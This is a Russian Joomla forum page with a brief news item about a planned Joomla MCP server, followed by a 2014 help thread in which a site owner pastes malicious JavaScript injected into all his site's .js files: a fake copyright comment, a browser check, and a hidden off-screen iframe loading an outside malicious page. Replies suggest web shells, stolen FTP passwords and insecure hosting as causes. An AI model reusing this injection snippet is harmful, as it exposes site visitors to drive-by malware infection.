Новости Joomla

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

В февральском номере Joomla Community Magazine в статье Evolving Joomla - Joomla CMS MCP Server: Opening the Door to AI-Powered Administration рассказывается о работе команды разработчиков над внедрением в ядро Joomla MCP-сервера.

Что такое MCP-сервер?
Последние годы всех захватывает бум ИИ-технологий. Появились ИИ-агенты - программы, устанавливаемые на сервер или компьютер, которые получают от вас запрос или задачу в человеческом виде и могут выполнять действия с файлами, ходить по сайтам, создавать сайты, программировать и т.д. Люди используют ИИ-агентов в самых разных ситуациях: от написания и проверки кода (даже там, где язык программирования не знаете совсем) до планирования путешествий и бронирования гостиницы.

ИИ-агенты могут использовать различные программные инструменты по протоколу Model Context Protocol (MCP). Для этого разработчик программы должен внедрить MCP в свой продукт или сервис. Так, например, ваш ИИ-агент может ходить по сайтам через браузер и собирать нужную информацию, управляя браузером через MCP-сервер. Или использовать функционал IDE PHP Storm для написания кода, сбора и отладки ошибок, использовать поиск PHP Storm по кодовой базе, а не простой текстовый поиск по файлам. MCP предоставляет набор функций для полноценного управления программным обеспечением.

В случае с Joomla, сервер MCP может предоставить администраторам следующие возможности:
- Автоматическое создание категорий, материалов и меню на основе карты сайта или PDF-файла.
- Создавайть SEO-оптимизированные заголовки и метаописания в пакетном режиме.
- Обновлять расширения на нескольких сайтах одновременно
- Создание посадочные страницы.

Важно отметить, что сервер MCP не задумывался как функция, доступная только «супер-администраторам». Цель инициативы — создать решение, которое будет простым в настройке, маломощным и доступным для широкого круга пользователей.

В процессе разработки точка входа Joomla (аналогично Site, Administrator, Api, Cli), которая будет работать с Streamable HTTP, необходимым для MCP. Аутентификация пока что предполагается на токенах, но затем планируется создание универсального OAuth-сервера для Joomla.
Фактические возможности MCP — инструменты, ресурсы и подсказки — реализованы в виде плагинов для обеспечения расширяемости. Таким образом ожидаем, что и сторонние разработчики смогут создавать MCP-плагины для внедрения поддержки своих расширений Joomla для работы с ИИ.

@joomlafeed

Вышли релизы безопасности Joomla 6.0.4 и Joomla 5.4.4

Релиз безопасности Joomla 6.0.4 и Joomla 5.4.4

Проект Joomla! рад сообщить о выходе Joomla 6.0.4 и Joomla 5.4.4. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 1412 Просмотров
*

Михалыч

  • Осваиваюсь на форуме
  • 26
  • 0 / 0
Прислал мне Яндекс.Вебмастер письмо следующего содержания:
"На страницах вашего сайта radar67.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных.
В настоящий момент сайт выводится в результатах поиска  с пометкой «Этот сайт может угрожать безопасности вашего компьютера»."

Проверка архива сайта Касперским и Вебером ничего не дала, сайт чистый. Написал В техподдержку Яндекса, что так мол и так, проверил, сайт чистый.
Они прислали мне код, на который ругается их антивирус. Я проверил все js файлы на сайте и действительно, во всех файлах, в самой первой строке js файлов вставлен следующий код:

/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function Linode() {
var d = navigator.userAgent;
var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1);
if (!f) {
document.write('<iframe src="http://quwalda.runningfoxes.net/jtrsqgdhstjsjkt14.html" style="position:absolute;le'+'ft:-1340px;t'+'op:-1340px;" height="133" width="133"></iframe>');
}
}
Linode();
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
*/

Я удалил этот код во всех файлах, залил на сайт, но через 3-5 минут код опять появляется в js файлах.
Подскажите откуда лезет эта зараза и где копать?
PS Google на вирусы на сайте не ругается, только Яндекс.
*

Taatshi

  • Гуру
  • 5258
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Вирус на сайте (или неизвестно что)
« Ответ #1 : 25.06.2014, 01:37:42 »
Не все удалили. Нужно проводить полный аудит сайта.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Вирус на сайте (или неизвестно что)
« Ответ #2 : 25.06.2014, 07:08:46 »
Если антивирусники не нашли вирус- то устаревшая версия Joomla, уязвимости в сторонних расширениях, кража пароля ftp
Сканер айболит в помощь, искать шелл
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирус на сайте (или неизвестно что)
« Ответ #3 : 25.06.2014, 09:23:34 »
Недавно аналогичный случай был при чистке, Яндекс в бан закинул клиента, с похожей структурой заразы, во всех js файлах на сайте, при этом было много мини шеллов, пол дня провозился с подобной ситуацией, после чистки, буквально на следующий день Яндекс отпустил с бана.
*

Михалыч

  • Осваиваюсь на форуме
  • 26
  • 0 / 0
Re: Вирус на сайте (или неизвестно что)
« Ответ #4 : 25.06.2014, 09:37:55 »
Если антивирусники не нашли вирус- то устаревшая версия Joomla, уязвимости в сторонних расширениях, кража пароля ftp
Сканер айболит в помощь, искать шелл

Версия Joomla самая последняя, все пароли, в т.ч. и от ftp поменял
*

Taatshi

  • Гуру
  • 5258
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Вирус на сайте (или неизвестно что)
« Ответ #5 : 25.06.2014, 09:51:25 »
А сайт на хостинге один? Если нет - нужно чистить все одновременно.
« Последнее редактирование: 25.06.2014, 14:06:48 от Taatshi »
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирус на сайте (или неизвестно что)
« Ответ #6 : 25.06.2014, 11:50:50 »
Бывают еще проблемы на самом хостинге, очень многие подвержены такому типу уязвимости как реверс, т.е имея нужные знания, можно иметь доступ ко всем площадкам хостинга!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Вирус на сайте (или неизвестно что)
« Ответ #7 : 25.06.2014, 14:12:08 »
т.е имея нужные знания, можно иметь доступ ко всем площадкам хостинга!
и это как не прискорбно в наше время еще актуально
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирус на сайте (или неизвестно что)
« Ответ #8 : 25.06.2014, 16:28:19 »
и это как не прискорбно в наше время еще актуально
Решение одно!, менять хостера, перед чисткой своих клиентов, всегда проверяю возможность реверса и рутабельности, и если выявляется такое, то сразу же говорю клиенту, что возьмусь за чистку только после того, как сменят хостера, жаль, что о вопросе рутабельности не многие знают((
*

Михалыч

  • Осваиваюсь на форуме
  • 26
  • 0 / 0
Re: Вирус на сайте (или неизвестно что)
« Ответ #9 : 25.06.2014, 18:00:16 »
Решение одно!, менять хостера, перед чисткой своих клиентов, всегда проверяю возможность реверса и рутабельности, и если выявляется такое, то сразу же говорю клиенту, что возьмусь за чистку только после того, как сменят хостера, жаль, что о вопросе рутабельности не многие знают((

Хостера менять не хотелось бы, но возможно придется. Кого можете посоветовать?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирус на сайте (или неизвестно что)
« Ответ #10 : 25.06.2014, 20:11:29 »
Хостера менять не хотелось бы, но возможно придется. Кого можете посоветовать?
Могу посоветовать отдельный VDS у того же хостера, а не виртуалку...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 73687
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 4886
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5879
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 4150
Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

Ответов: 13
Просмотров: 2718
Последний ответ 16.05.2021, 18:52:24
от alekcae